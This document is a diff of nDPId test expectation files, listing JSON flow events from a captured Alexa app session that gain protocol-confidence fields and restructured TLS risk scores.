 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1490976136930,"flow_last_seen":1490976140745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13686,"flow_avg_l4_payload_len":333,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976142629,"flow_last_seen":1490976148981,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3595,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1490976076042,"flow_last_seen":1490976177233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3494,"flow_avg_l4_payload_len":145,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976196942,"flow_last_seen":1490976198168,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11051,"flow_avg_l4_payload_len":460,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976197297,"flow_last_seen":1490976198043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9036,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00774{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071392,"flow_last_seen":1490976176431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5656,"flow_avg_l4_payload_len":245,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976195983,"flow_last_seen":1490976196942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13938,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":350,"flow_first_seen":1490976195984,"flow_last_seen":1490976198040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":248700,"flow_avg_l4_payload_len":710,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1490976195985,"flow_last_seen":1490976196943,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15782,"flow_avg_l4_payload_len":450,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1490976195529,"flow_last_seen":1490976198776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":34748,"flow_avg_l4_payload_len":534,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976196942,"flow_last_seen":1490976198168,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11051,"flow_avg_l4_payload_len":460,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976197297,"flow_last_seen":1490976198043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9036,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+01041{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071392,"flow_last_seen":1490976176431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5656,"flow_avg_l4_payload_len":245,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976195983,"flow_last_seen":1490976196942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13938,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":350,"flow_first_seen":1490976195984,"flow_last_seen":1490976198040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":248700,"flow_avg_l4_payload_len":710,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1490976195985,"flow_last_seen":1490976196943,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15782,"flow_avg_l4_payload_len":450,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1490976195529,"flow_last_seen":1490976198776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":34748,"flow_avg_l4_payload_len":534,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1490976085644,"flow_last_seen":1490976098828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":21353,"flow_avg_l4_payload_len":381,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976085829,"flow_last_seen":1490976088478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4344,"flow_avg_l4_payload_len":188,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976085832,"flow_last_seen":1490976088478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2595,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976088605,"flow_last_seen":1490976094930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":1938,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
